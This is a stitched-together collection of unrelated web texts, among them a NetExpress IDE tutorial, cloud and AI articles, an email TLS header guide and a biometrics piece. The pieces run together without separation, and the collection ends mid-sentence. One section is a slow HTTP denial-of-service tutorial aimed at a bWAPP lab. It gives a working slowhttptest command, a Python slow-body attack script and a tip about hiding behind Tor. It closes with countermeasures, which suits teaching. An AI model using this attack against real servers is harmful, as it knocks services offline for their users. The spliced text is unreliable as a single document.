Cross-platform specifies the method NetExpress uses to ensure objects in your positional form are positioned as you wish. Cross-platform forms use HTML tables for this. In Dynamic HTML, style attributes are used. HTML tables are supported by more browsers. Dynamic HTML offers more exact positioning, but is only supported by Internet Explorer 4.0. Remember that your forms will be seen by users with different browsers.

You might get one or both of these messages if this session has been run previously. Otherwise the next dialog box appears straight away. The next dialog box shows a summary of what you have selected.

The HTML Wizard generates the form, and finishes. The names of the generated files are added to the project, then the project is scanned for dependencies.

Then the IDE opens a form design window, recognizable by its dotted grid background, and three related windows. An extra toolbar appears, with three tabs. It is called the object toolbar, and contains objects you might want to add to a form. Extra menus, Page and Arrange, appear on the menu bar. This also starts Solo, the Web server software included in NetExpress; you may notice the Solo icon appearing in the Windows taskbar tray. You can ignore it for now - Form Designer needs it running in the background. Your IDE now looks something like Figure 8-1.

Figure 8-1: The IDE with Form Designer's Windows Open

The four new windows are:

- The window with the dotted grid background is where you design your form. The form mypage.htm that you just created is loaded ready for you to design it. Notice that most of its area is taken up by a rectangle shown as highlighted. This is the positional form.
- The window at the top right shows you all the controls on your form. You can rename controls by right-clicking on them and selecting Rename from the context menu.
- The window below the control tree window shows the properties for the object currently selected in the form design window. Property names are listed down the left, and the corresponding values down the right. You can edit any property by clicking in its value field.
- The window at the bottom right displays help for the property list window. If you click any field in the property list window, help for that field appears in the help window.

You may want to drag the form design window aside for a moment to see how the project has changed. You may want to move windows around your IDE or resize them so you can see them all clearly.

To design your form:

This creates an entry field - a field where your end-user can enter or display data - at the place where you clicked. You can drag it around with the mouse after you have placed it, by putting the mouse pointer in its border and holding down the mouse button. Put it towards the right-hand side of the window. Notice the Name property in the property list window (you may have to click in the list and use the arrow keys to go up or down the list to see it). It is input1. This will be the data-name for this field in the COBOL program you generate later.

A rectangle appears for a moment, and then both fields are highlighted. This lines up the two fields. Notice that the Name property in the Property List for this second entry field is input2. You should now have a form that looks something like Figure 8-2.

Figure 8-2: The Form You've Created in the Form Design Window

The form design window and its associated windows all close. You don't strictly need to close them here - you could keep them open through the next section - but closing them prevents the screen getting too crowded.

You use Internet Application Wizard to create the server-side program:

The first page of Internet Application Wizard appears. On this page you choose which of the three methods of creating an application, as described in the chapter Introduction to Web Applications, you wish to use. In the lower part of the dialog box, HTML Form(s) is automatically selected.

The page that now appears enables you to give a name to your server-side program, and to specify the input form and one or more output forms that it is to use. This is the filename that will be given to your server-side program. Unless the project folder has been used previously, mypage will be the only form present. The Input File/Form field is automatically set to mypage.

A server-side program has one input form, and one or more output forms. A program like this one, which has just one form for both input and output, is called a symmetric server-side program.

This displays a dialog box showing a summary of what you have selected. The Internet Application Wizard generates the program, and finishes. The names of the generated files are added to the project, then the project is scanned for dependencies. Internet Application Wizard then closes.

You have now created your user interface. The Wizards and Form Designer have created the following files for you and added them to the project (you may have to expand the tree view in the project window by clicking the "+" signs to see them all):

The following file is shown in the right-hand pane only:

It has also added to the project the following object files, created when you build the project:

It has also created several copyfiles (extensions .cp*). Their purpose is described in comments in the .cbl file. Although the filenames are shown above in lower case, some might appear in upper case in the project. Filenames are not case sensitive.

If you ever need to update the form, you simply double-click mypage.htm in the project window, and Form Designer opens. When you save the updated form, the copyfiles are regenerated, so you should not edit them directly. You can, however, edit the .cbl program that the Wizard generated.

If you're reading this book in your Web browser, you should start a new instance of your browser (use the New function on its File menu) so that you can still see the book during this section.

To see how your form looks in your Web browser:

This opens the form for editing again. We are not going to make any more changes - we have opened the form for editing just to make the Page and Arrange menus appear on the menu bar again.

This starts your Web browser, if it's not already running, and loads your form. It would also start Solo, if Solo were not already running. This is explained in more detail in the next session, Completing and Running Your Web Application. For now you are just checking to see how the form looks in your browser. You'll notice that the two entry fields contain ":f-Input1" and ":f-Input2". You can ignore these; they are placeholders for the data that will be displayed when your server-side program displays the form.

If you want, you can now see your server-side program running, although you haven't yet added the business logic.

NetExpress builds the .exe file. Your server-side program now runs and displays the form in your browser. You'll notice that the placeholders are no longer visible. The IDE is automatically minimized. The program runs and redisplays the form, but nothing is displayed in the second field, as you have not added any business logic yet. We will do this in the next session, Completing and Running Your Web Application.

If you opened a second instance of your Web browser to display the form, close it.

In the next session, Completing and Running Your Web Application, you get this application working fully. If you're planning to go on to that session right away, you can keep the project open. If you want to take a break first, you can close the project and open it again at the start of the next session. Or you can close NetExpress entirely, with or without closing the project first. You can also close Solo, by right-clicking the Solo icon in the Windows taskbar tray and clicking Exit on the popup menu.

Copyright © 1998 Micro Focus Limited. All rights reserved.
This document and the proprietary marks and names used herein are protected by international law.
Platform as a Service (PaaS)

NIST defines PaaS cloud computing as: "The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment."

PaaS vendors offer a toolkit and standards for development, along with channels for distribution and payment. The computing platform typically includes an operating system, programming-language execution environment, database, and web server. Application developers develop and run their software on the cloud platform. Some PaaS solutions automatically scale computing and storage resources to match demand, so that administrators do not have to manually allocate the additional resources required.
Artificial intelligence (AI) will not wipe out the need for human workers and create a dystopian environment run by evil machines. Instead, the technology will help diversify human thinking and bolster collaboration between people and automated systems.

That's the view of a newly released report from consulting firm Tata Communications, which is based on a survey of 120 global business leaders. It includes input from in-depth interviews with entrepreneurs, executives, and thought-leaders, as well as discussion forums featuring internationally renowned experts from the fields of AI, machine learning, design, art, government, politics, ethics, entrepreneurship, behavioural economics, journalism, engineering, and human resources. The study envisions a positive impact of AI in the workplace of the future.

Among the key findings of the study: a huge majority of the leaders surveyed (90 percent) agree that cognitive diversity is important for management; three quarters expect AI to create new roles for their employees; and 93 percent think AI will enhance decision-making.

"The prevalent narrative around AI has focused on a 'singularity' – a hypothetical time when artificial intelligence will surpass humans," said Ken Goldberg, a professor at the University of California at Berkeley and co-author of the report. "But there is a growing interest in 'multiplicity', where AI helps groups of machines and humans collaborate to innovate and solve problems."

The survey of business leaders indicates that the concept of multiplicity, the positive and inclusive vision of AI, is gaining ground, Goldberg said.

AI is now being viewed as a new category of intelligence that can complement existing categories of emotional, social, spatial, and creative intelligence, noted Vinod Kumar, CEO and managing director at Tata Communications and also a co-author of the study. Multiplicity is transformational because it can enhance cognitive diversity, combining categories of intelligence in new ways to benefit all workers and businesses, Kumar said.
Asymmetric DoS: The Slow HTTP Attack

The story of David and Goliath

Have you ever heard the story of David and Goliath? David, a young boy, goes out to confront a giant named Goliath. David is the underdog in this fight and is expected to lose. But everyone underestimates David and his prowess with a slingshot. When David ultimately kills Goliath, he demonstrates that even a little guy can triumph over the biggest and strongest of enemies. Fine! Today we are going to talk about unequal scenarios. Furthermore, we are going to battle one ourselves.

Let's get started

So, let's imagine, for a moment, that all you need to kill the giant that everyone fears is a little slingshot, not a big mace, nor the strength of a thousand men. Sound crazy? Well, it is. But it's possible. A cyber attack is considered "asymmetric" in the sense that you only need a few resources, in this case a laptop, in order to cause a considerable amount of damage, malfunction, or failure in the server. A very real case of David vs. Goliath. If we push hard enough, the server is going to stop providing the service to other users; in other words, we will cause a Denial of Service (DoS).

How does a slow HTTP attack work?

Imagine a line at the local fast food restaurant. A customer at the head of the line can't decide if he wants a burger or a hot dog. People behind him in line are getting mad; they aren't getting their food because he is holding up the whole line. If you look at it in more detail, all this customer needed to do was "not know what to order". His indecision basically caused a denial of service for every other person waiting behind him at the counter, i.e., a DoS.

Now imagine the same line, but the customer at the counter knows what he wants to order, and he's ordering a thousand burgers and a hundred hot dogs. Again, this means everyone behind him in line will have to wait while his order is filled. The restaurant can take no more orders until his is complete.

The HTTP protocol works similarly: it requires requests to be fully received before they are processed. If a request is not completed, the server can either wait or mark the request as timed out after a few seconds. However, if you let the request complete, but at a slow rate, then the server will keep the resource busy waiting for the end of the data.

What would happen if the customer orders a thousand burgers and a hundred hot dogs, but he can't decide which sauces and drinks to order with them? And, to make matters worse, he seems to be intentionally indecisive and he's speaking very slowly. This is exactly the idea behind a slow HTTP attack. A web server keeps its active connections in a relatively small connection pool. We will try to tie up all the connections in this pool with slow requests, making the server reject other users.

Let's do an HTTP request

First, let's run a bWAPP server on IP 192.168.56.101.

Figure 1. bWAPP server

For now, let's assume that we are at http://192.168.56.101/bWAPP/xss_post.php, and we entered some test values in the form:

Figure 2. XSS page and input

Once we access a page, the browser is going to ask the server for some resources, and we can see these requests and responses from the command line using curl (or from the developer tools built into Google Chrome or Firefox). The process using curl is:

$ # login to the server so we can see the page we want as a logged-in user
$ curl -L -c post_login_cookie 'http://192.168.56.101/bWAPP/login.php' \
  --data 'login=bee&password=bug&security_level=0&form=submit'
$ # result: a file is saved with name 'post_login_cookie'
$
$ # submit a post request with the data we want in the field
$ curl -L -b post_login_cookie -v \
  -d "firstname=test1&lastname=test2&form=submit" \
  http://192.168.56.101/bWAPP/xss_post.php
$ # output is displayed to console, we'll see it in a moment

As mentioned before, every single resource is going to have a request and a corresponding response. In other words, we are asking the server for the xss_post.php resource with the parameters firstname=test1, lastname=test2, and form=submit. Since we want to see an HTML page, curl asks for it:

curl, server request output:

* Trying 192.168.56.101...
* TCP_NODELAY set
* Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
> POST /bWAPP/xss_post.php HTTP/1.1
> Host: 192.168.56.101
> User-Agent: curl/7.58.0
> Accept: */*
> Cookie: PHPSESSID=5fvb1fr053gmc2f91ooicvf1f5; security_level=0
> Content-Length: 41
> Content-Type: application/x-www-form-urlencoded

And the server replies with:

curl, server response output:

* upload completely sent off: 41 out of 41 bytes
< HTTP/1.1 200 OK
< Date: Thu, 15 Nov 2018 21:31:32 GMT
< Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
< X-Powered-By: PHP/5.3.2-1ubuntu4.30
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 11291
< Content-Type: text/html

At this point, nothing stops us from sending follow-up headers with random values, waiting some seconds between each one. And nothing stops us from simulating a slow connection on each one of these requests, so the server is going to have to wait until the full resource has been transferred. Why not make a thousand requests, until every single connection available in the server pool is busy with us? To do this, we are going to use a tool.

First, let's pull the slowhttptest docker image from Docker Hub:

docker pull frapsoft/slowhttptest

And write the following command:

sudo docker run --name DoSBWAPP --rm frapsoft/slowhttptest \
  -c 65539 -B -i 10 -l 300 -r 10000 -s 16384 -t firstname \
  -u "http://192.168.56.101/bWAPP/xss_get.php" -x 10 -p 300

The parameters are described below, matching each description to its flag in the command above:

Table 1. slowhttptest parameters
- -c 65539: use 65539 connections
- -B: slow down the HTTP request in message body mode
- -i 10: seconds of interval between follow-up data, per connection
- -l 300: duration of the test in seconds
- -p 300: timeout in seconds to wait for an HTTP response on the probe connection, after which the server is considered inaccessible
- -r 10000: connections per second
- -s 16384: value of the Content-Length header
- -x 10: max length of follow-up data in bytes
- -t firstname: add ?firstname=(10 bytes of follow-up data, per -x) to the target URL

While the attack is running, a user that tries to access the service is going to see:

Figure 3. bWAPP is trying to connect without success

If the attack is long enough, it is going to get timed out:

Figure 4. bWAPP gets timed out

Once the attack is finished, everything returns to a normal state:

Figure 5. bWAPP working normally after the attack

Since we only need a few resources (the internet and a laptop), we can even do it on a low-bandwidth connection. Moreover, since we don't need much bandwidth, we can pass everything through a proxy in the Tor network and hide ourselves.

Sounds scary, how do I protect myself?

Countermeasures depend mainly on your service. Some useful mechanisms to prevent this kind of attack are:

- Limit the number of resources an unauthorized user can expend.
- Set the header and message body to a maximum reasonable length.
- Define a minimum incoming data rate, and drop connections that are slower.
- Set an absolute connection timeout.
- Use a Web Application Firewall (WAF).
- Reject connections with verbs not supported by the URL.

In cases where you need to set minimum and maximum limits, it's a good idea to derive the values from your own traffic statistics. If a limit is too short, you risk dropping legitimate connections; if it is too long, you won't get any protection from attacks. Using a margin ranging from one to two standard deviations may help you with this.

I really hope that you liked this article. I wish you a nice week, and will see you in another post!
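For readers who want to see the mechanics without Docker, below is a stripped-down sketch of the slow-body technique using only Python's standard library, aimed at the same bWAPP lab target used above. It declares the full Content-Length up front and then trickles the body one byte at a time, which is exactly what keeps a server worker tied up. This is a teaching sketch under those assumptions, not a replacement for slowhttptest, and as always, run it only against systems you own or are explicitly authorized to test.

```python
import socket
import time

HOST, PORT = "192.168.56.101", 80   # the bWAPP lab machine from above
PATH = "/bWAPP/xss_post.php"
BODY = b"firstname=test1&lastname=test2&form=submit"


def slow_request(interval: float = 10.0) -> None:
    """Open one connection and feed the body a byte at a time."""
    s = socket.create_connection((HOST, PORT))
    headers = (
        f"POST {PATH} HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(BODY)}\r\n"
        "\r\n"
    )
    s.sendall(headers.encode())     # headers arrive promptly ...
    for byte in BODY:
        s.send(bytes([byte]))       # ... then one body byte at a time,
        time.sleep(interval)        # forcing the server to keep waiting
    s.close()


# A real attack opens hundreds of these concurrently (threads or async)
# until the server's connection pool is exhausted.
slow_request()
```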
By Daniel McGee, director of technology and library services, Laurel School.

Thus far, 2020 has been a year in which the field of educational technology has been permanently altered. This year's Covid-19 pandemic has brought challenges and confusion to daily life, with educational institutions pivoting to a distance learning model nearly overnight. The impact of this shift has been far-reaching, affecting the cadence and delivery of daily instruction and creating a new impetus for teachers to learn and upskill quickly. The result is a watershed moment for educational technology that will cause ripple effects in education for this and future generations.

For private, independent schools, the conversations, processes, and procedures have been different from those affecting public schools, though the needs of students remain the same. In my role as an independent school technology director, the lessons of the past few months have been a series of dichotomous notions: a time for careful planning that is also a time of flying by the seat of your pants; and notably, a time when new rules are created even as the basic tenets of educational technology prove to be helpful guides. I have learned some essential lessons that are helpful now, and I see them as being helpful in perpetuity.

Lesson One: Select Familiar Tools and Technology

The first lesson is the importance of educational technology leaders selecting distance learning tools and topics that are familiar to teachers and students. Having a minimal set of familiar, established systems for students, teachers, and families to access lowers the barriers to success and allows students to focus on learning what they need to know, not on acclimating themselves to a host of new tools. The middle of a pandemic is not an optimal time to introduce new tools if it can be avoided.

If a school has a learning management system (LMS) in place and is actively using it, it is a hard case to introduce a new system. The LMS is the stand-in for the physical classroom; just as physically moving a home or school is a disorienting process that requires acclimation, the virtual classroom environment fostered through the LMS should remain as consistent as possible.

Video meetings have become a staple of the distance learning experience. For schools using a suite of online productivity tools such as Google's G Suite or Microsoft's Office 365, using Meet or Teams lowers the barriers of entry for teachers and students, thanks to the integrated nature of these video services within the larger platform.

Consistency is key in using any online tool: first in the selection of a single, unified tool for the school to use, and second in its use and deployment. Experts in online learning advise the use of a common template for teachers to craft LMS course pages, and students should have a consistent means of accessing their virtual classrooms via the chosen video conferencing platform.
August 12th marks the 60th anniversary of one of the most famous children's books of all time: Dr. Seuss's Green Eggs and Ham. The book was the result of a $50 bet between the author and his publisher that Dr. Seuss couldn't write a book using only 50 words. This "simple" book is full of lessons that are worth revisiting.

Be willing to change your mind

The unnamed character in the book doesn't think he'll like Green Eggs and Ham, and that belief drives his refusal to try them. Spoiler alert: he ends up liking them quite a bit. New things can often make us feel like Sam-I-am is offering us Green Eggs and Ham, but if we have an open mind, we may be pleasantly surprised!

For those of us engaged in sales, Sam-I-am is the ultimate salesperson!! He simply did not accept defeat and kept on selling the virtues of Green Eggs and Ham! While we probably can't use "in a house" or "with a mouse" as effective strategies, Sam-I-am surely modeled the willingness to overcome objections at every turn!

Be willing to use a different approach

Persistence is important, but overcoming objections sometimes means changing your approach. It means that if you can't make the sale with a box or with a fox, perhaps you need to try to make the sale with a goat or a boat! Seriously, every customer is different, and finding the right benefits is the key to making the sale!

Asking the right questions is the key to handling so many different customer issues! Before you rush to a solution, make sure you're asking all the right questions first. Whether you're troubleshooting, selling, or servicing, asking questions that allow you to see the whole picture leads to efficient resolution!

Sam-I-am spent an entire book dealing with a cantankerous customer and did so with a smile the entire time! "You may like them. You will see." That optimism and positive attitude eventually led the unnamed character to try those Green Eggs and Ham!

Focus on your goal

It's easy to get distracted. In a car, in a tree, on a train, in the rain, in the dark, with a goat, on a boat - Sam-I-am kept his eyes on the goal at every crazy turn, and that focus paid off!

While I've outlined a few here, I am sure there are even more lessons to be learned from this classic, even if our reading skills suggest a more "complicated" book. If you now feel an immediate and insatiable desire to experience this book again, you can listen and read along here. Learn even more about Dr. Seuss with Becoming Dr. Seuss by Brian Jay Jones.
How Can You Tell if an Email Was Transmitted Using TLS Encryption?

Frequently, we are asked to verify whether a sent or received email was encrypted using SMTP TLS during transmission. For example, banks, healthcare organizations under HIPAA, and other security-aware institutions require that emails be secured by TLS encryption. Email should always be transmitted with this basic level of encryption to ensure that the message content cannot be eavesdropped upon.

To see if a message was sent securely, you can look at the raw headers of the email message in question; however, it requires some knowledge and experience to understand the text. It is actually easier to tell if a recipient's server supports TLS than to tell if a particular message was securely transmitted.

To analyze a message for transmission security, we will look at an example email message sent from Hotmail to LuxSci. We will see that Hotmail did not use TLS when sending this message. Hotmail is not a good provider to use when security or privacy are required.

An Example Email Message

First, we must understand that an email message typically passes through several machines on its way from sender to recipient. Roughly speaking:

- The sender's computer talks to the sender's email or WebMail server to upload the message.
- The sender's email or WebMail server then talks to the recipient's inbound email server and transmits the message to them.
- Finally, the recipient downloads the message from their email server.

(For more details, see this article.)

It is step 2 that people are most concerned about; they usually assume or check that everything is secure and OK at the two ends. Indeed, most users who need to can take steps to ensure that they are using SSL-enabled WebMail or POP/IMAP/SMTP/Exchange services, so that steps 1 and 3 are indeed secure. The intermediate step, where the email is transmitted between two different providers, is where messages may be insecurely transmitted.

To determine whether the message was transmitted between the sender's and recipient's servers securely (over TLS), we need to extract the "Received" header lines from the received email message. If you look at the "source" of the email message, the lines at the top start with "Received." In an example email message from someone on Hotmail, the Received headers look like this (the email addresses, IPs, and other information are fake for obvious reasons).

What do These Received Headers Say?

The things to notice about these Received headers are:

- They are in reverse chronological order. The first one listed shows the last server that touched the message; the last one is the first server that touched it.
- Each Received line documents what a server did and when.
- There are three sets of servers involved in this example: one machine at Hotmail, one machine at Proofpoint, where our Premium Email Filtering takes place, and some machines at LuxSci, where final acceptance of the message and subsequent delivery happened.

Presumably, the processing of email within each provider is secure. So, you have to watch out for the hand-offs between Hotmail and Proofpoint and between Proofpoint and LuxSci, as these are the big hops across the internet between providers.

In the line where LuxSci accepts the message from Proofpoint, we see:

(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)

This section, typical of most email servers running "sendmail" with TLS support, indicates that the message was encrypted during transport with TLS using 256-bit AES encryption. ("verify=NOT" means that LuxSci did not ask Proofpoint for an SSL client certificate to verify itself, as that is not usually needed or required for SMTP TLS to work correctly.) Also, "TLSv1/SSLv3" is a tag that means "some version of SSL or TLS was used"; it does not mean that it was SSL v3 or TLS v1.0. It could just as well have been TLS v1.2 or TLS v1.3.

So, the hop between Proofpoint and LuxSci was locked down and secure. What about the hop between Hotmail and Proofpoint? The Proofpoint server's Received line makes no note of security at all! This means that the message was probably NOT encrypted during this step. Whose fault is that? Well, at the time, either Hotmail did not support opportunistic TLS encryption for outbound email, OR Proofpoint did not support receipt of messages over TLS, and thus TLS could not be used. Without further context, you would not know which server (or both) did not support TLS.

We know that Proofpoint, like LuxSci, supports inbound TLS encryption. In fact, from another example message where LuxSci sent a message to Proofpoint, we see the Received line:

Received: from unknown [220.127.116.11] (EHLO wgh.luxsci.com) by dispatch1-us1.ppe-hosted.com (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) with ESMTP id b-022.p01c11m003.ppe-hosted.com (envelope-from <[email protected]>); Mon, 02 Feb 2009 19:28:27 -0700 (MST)

The TLS details in this header ("using TLSv1.2 with cipher ...") make it clear that the message was indeed encrypted.

Some things to consider when analyzing email headers for encryption usage:

- The receiving server will log in the headers what kind of encryption, if any, was used in receiving the message.
- Different email servers use different formats and syntax to record what kind of encryption was used. Look for keywords like "SSL," "TLS," "Encryption," etc., which will signify this information.
- Not all servers will record the use of encryption; nothing says that they have to. While LuxSci has always logged encryption use, McAfee has only been logging this since 2008. Before that time, TLS encryption was still possible and normal with their servers, but there was no way to tell from the headers whether it was used.
- Messages passed between servers at the same provider do not necessarily need TLS encryption to be secure. For example, LuxSci has back-channel private network connections between many servers so that information can pass between them without SMTP TLS, but where the data is still secured. So, the lack of TLS usage between two servers does not mean that the transmission between them was "insecure." You may also see multiple Received lines listing the same server: the server passes the message between different processes within itself, and this communication also does not need to be TLS encrypted.
- If you are a LuxSci customer, view the online email delivery reports to see if TLS was used for any particular message. We record the kind of encryption in the delivery reports, so there is no need to read message headers.

How can you ensure Secure Message Transmission?

With some servers not reporting the use of TLS, and in some cases TLS not being needed, how can you determine whether a message was transmitted securely from sender to recipient? To answer this question accurately, you must understand the properties of the servers and networks involved. While you may be able to answer in the affirmative based on headers in some cases, you cannot necessarily answer in the negative without knowing what each system's servers record. In our example of a message from Hotmail to LuxSci, you need to know that:

- Proofpoint and LuxSci will always log the use of TLS in the headers. This tells us that the Hotmail-to-Proofpoint hop was not secure, as nothing is recorded there.
- The transmission of messages within LuxSci's infrastructure is secure due to private back-channel transmissions. So, even though there is no mention of TLS in every Received line after LuxSci accepts the message from Proofpoint (in this example), the transfer of messages between servers in LuxSci is as secure as using TLS. Also, multiple Received lines can be added by the same server as it talks to itself. Generally, these hand-offs on the same server will not use TLS, as there is no need. We see this also in the LuxSci example, as "abc.luxsci.com" adds several headers.
- We don't know anything about Hotmail's email servers, so we don't know how secure the initial transmissions within their network are. However, since we know that they did not securely transmit the message to Proofpoint, even though they could have, we do not have much confidence that the transmissions and processing within Hotmail (which may have gone unrecorded) were secure at all.

What about the initial sending and receipt of the message?

So far, we have skipped steps 1 and 3 and focused on step 2, the transmission between servers. Steps 1 and 3 are equally, if not more, important. Why? Because eavesdropping on the internet between ISPs is less of a problem than eavesdropping near the sender and recipient (i.e., in their workplace or local wireless hotspot). So, one must ensure messages are both sent securely and received securely. This means:

- Sending: Use SMTP over SSL or TLS when sending from an email client, or use WebMail over a secure connection (HTTPS).
- Receiving: Be sure that your POP or IMAP connection is secured via SSL or TLS; if using WebMail to read your email, be sure it is over a secure connection (HTTPS).
- WebMail: There is generally no record in the email headers to indicate whether a message sent using WebMail was transmitted from the end-user to WebMail over a secure connection (SSL/HTTPS).

You can generally control one side and ensure it is secure; you can't control the other without taking extra steps. So, what can you do to ensure that your message is secure even if it might not be transmitted securely and your recipient might try to access it insecurely? You could use end-to-end email encryption (like PGP or S/MIME, which are included in SecureLine) or a secure email pickup service like SecureLine Escrow that doesn't require the recipient to install or set up anything to get your secure email message. These all meet the security requirements of HIPAA and of organizations that mandate email transmission encryption. Of course, if you can ensure that email sent from you to your essential recipients will always be transmitted securely, that is the best solution.
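If you analyze headers often, the manual inspection described in this article can be partially automated. The sketch below uses Python's standard email module to print each Received hop of a saved .eml file and flag whether it mentions TLS or SSL. Remember the caveat above: a hop with no match is not proof of an insecure transfer, since not every server records encryption, so treat the output as a starting point rather than a verdict.

```python
import re
import sys
from email import policy
from email.parser import BytesParser

# Keywords that commonly appear when a server logs transport encryption.
TLS_HINT = re.compile(r"\b(?:TLS|SSL|cipher|version=)\S*", re.IGNORECASE)


def audit_received_headers(eml_path: str) -> None:
    with open(eml_path, "rb") as fh:
        msg = BytesParser(policy=policy.default).parse(fh)

    # Received headers are listed newest-first, one per server hand-off.
    for i, hop in enumerate(msg.get_all("Received", []), start=1):
        hints = TLS_HINT.findall(str(hop))
        status = (
            "TLS/SSL mentioned: " + ", ".join(hints)
            if hints
            else "no encryption recorded (not necessarily insecure)"
        )
        first_line = str(hop).split(";")[0].strip()
        print(f"Hop {i}: {first_line}")
        print(f"        -> {status}")


if __name__ == "__main__":
    audit_received_headers(sys.argv[1])  # e.g. python audit.py message.eml
```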
May I know your password? No one in today's world is foolish enough to disclose their passwords that easily. Still, cybercriminals have successfully gathered numerous account details and used them to force their way into social media accounts. Ordinary people know this method as identity theft. A cybercriminal either uses your account or creates a fake one similar to yours and uses it for notorious purposes. For instance, they can use it to ask for money from your friends, publish sensitive material under your name to harm your reputation, and much more.

Identity theft is a common problem that many people have faced in their lifetime. Biometrics is a step forward in tackling this threat. However, how secure biometric authentication really is remains questionable. Therefore, I created this guide to assess the reliability of biometric authentication and to help you protect yourself from identity theft. Further, we will also discuss the necessary measures to make sure no one can steal your identity. So, if you are ready to open your eyes, let's begin.

What is Identity Theft?

Identity theft is when someone uses your credentials to steal your identity. Cybercriminals can sniff through trash bins to find your bank statement, or they can hack your computer to gain control over your account. In any case, the victim is commonly targeted for financial fraud, bad credit, or unauthorized transactions.

A personal motive usually steers identity theft in the case of social media accounts. Let's say a bully is disturbing some nerd on the playground, so the nerd decides to take revenge by uploading shameful posts from the bully's account. Identity theft is a serious crime, no matter what the motive behind it is.

How Does Biometrics Come to the Rescue?

One common thing behind all identity theft scams is the exposure of credentials and passwords. No cybercriminal can steal your identity unless he has your account password. There are several ways to gather that information: for instance, insider news, hacking, sending malware to your device, and much more. Even if you haven't told your password to anyone and it is not saved on your device, a hacker can sniff it out using security questions. Answers to your security questions are readily available on your social media accounts.

What these cybercriminals cannot steal (easily) is your biometric information. Let's see what personal data comes under the biometric umbrella.

Humans long ago shifted from using their thumbprints to sign a document to creating a unique signature. However, thumbprints, or fingerprints, are finding their way back into the world through digital mediums. It is a well-known fact that every person on this planet has a different fingerprint, even twins. Therefore, fingerprints are a reliable way to mark unique identities.

Facial recognition deals with collecting your facial structure for identification. It is the weakest of all the biometric authentication methods, which has led to a series of iterations. Initially, facial recognition was so weak that you could have fooled it using a picture. Later, developers introduced eye-movement checks to make it more robust. The facial recognition technology currently on the market uses an infrared grid to determine your facial structure, making the technology more robust and reliable.

A voice recognition model registers your speech frequency and pattern to authenticate your identity. You might have seen it in movies where a person unlocks a door by using voice commands. A hacker would need your voice samples, your exact password, and mind-blowing skill at mimicking your voice to use it against you. Thus, it is much more secure than a traditional password.

Firstly, keep in mind that the retina scan and the iris scan are different things. However, since they both deal with your eyes, let us group them for understanding's sake. Similar to fingerprints, every person's retinal and iris patterns are unique. In general, eye-scanning technology registers your eye pattern and uses it to verify your identity. Two significant facts govern the robustness and reliability of this method:

- No two people share the same eye patterns.
- An amputated eye decomposes quickly and won't be of any use to criminals.

How Biometrics Can Protect You from Identity Theft

Now that we understand what the different biometric identification processes are, let's see how they can protect us from identity theft.

You Become the Password

First and foremost comes the fact that with biometric technology, you become the password. The traditional forms of two-factor authentication either use your phone for an OTP or use security questions to confirm your identity, both of which are easier to crack. Once you have entered your biometric details into a system, it becomes nearly impossible for hackers to access your account or device.

Biometric authentication has only recently found its way into daily use. We could not have imagined using a fingerprint to open a phone in the last decade. Even being new, biometric technology has shown promise to protect individual data significantly. This technology has evolved enormously in a few years, and we can expect it to reach new highs in the future as well. Since developers are trying hard to make biometric authentication more robust each passing day, you can expect to use it everywhere, from grocery transactions to cross-country verification, in the coming years.

Extra Measures to Protect Your Identity

We are hoping for a bright future where identity theft becomes a minimal threat, or no threat at all, for ordinary people. Still, biometric authentication has not yet captured every field, device, and area, so there is better scope for it in the future. Meanwhile, this also highlights the vulnerabilities the technology currently has to deal with. Developers work day and night to make it more secure for us; what we can do is take the best precautions to protect ourselves. Here are some actionable tips you can apply quickly to feel safer with your identity:

- Update all your programs to the latest versions. Hackers usually exploit security holes to breach your device. By keeping your software up to date, you make sure a security patch is installed to eliminate previously existing vulnerabilities.
- Change your passwords frequently. You will come across this advice every time you read about cybersecurity. Changing your passwords in a timely fashion helps you keep your data safe: it won't take hackers much effort to crack an account whose password never changes.
- Use a password manager. If you find it difficult to remember passwords, I suggest using a password manager. A good password manager only requires a master password to control all other passwords. You can even keep your fingerprint as the master password on many devices.
- Never reveal answers to security questions publicly. Your security questions are often the only barrier left for a hacker to enter your system. Avoid filling in online forms for gifts or revealing such information to unknown people.

Although biometric authentication is relatively new in the market, it has proved to be a significant step in personal identification and data protection. We can also expect it to become more robust, complementing blockchain technology. It is reliable for securing your device and personal information; still, I suggest taking extra measures to keep yourself safe. Cybercriminals are also evolving, and they already have tools to break older biometric technologies. It is just a matter of time before cybercriminals find a way to bypass your biometrics. Therefore, the best way to keep your account safe is by using all possible security measures.
Ever Google search for your own name? Even if you haven’t, there’s a good chance that a friend, family member or potential employer will at some point. And when they do, do you know everything that they’ll find? Google is chock full of personal information you may not always want public. Whether it’s gathered by the search engine itself or scummy people-search websites, you have a right to know what kind of data other people can access when they look up your name. Tap or click here to see how to remove yourself from people search sites. What others see about you online can mean the difference in landing a job or spending more time looking for one. If you want to take control of your reputation online, here’s why you need to start searching for yourself before others beat you to it. Use exact phrases to find more than mentions To get started with searching yourself on Google, it’s important to know how to search for exact phrases. This means telling Google you want to look up the words you typed exactly as you typed them — with no splitting terms or looking up one word while ignoring others. To do this, simply search for your name (or any term) in quotation marks. As an example, look up “Kim Komando” and include quotation marks. Now, Google won’t show results for Kim Kardashian along with Komando.com. Using exact phrases will weed out results for other people with similar names to yours. If you have a more common name, you may have to go through several pages before finding yourself. If you aren’t finding anything or your name is very common, use your name plus modifiers like the city or state you live in, the names of your school(s), the name of the company you work for or other details. Make note of anything that you don’t feel comfortable with others finding and either write down the web addresses or bookmark them. A picture says a thousand words After you’ve saved the websites you want to go over, switch over to Google’s Image Search and scan through any pictures of you. It’s much easier to look through hundreds of images quickly versus hundreds of links, and you might be surprised at the images and websites you find. If you find an 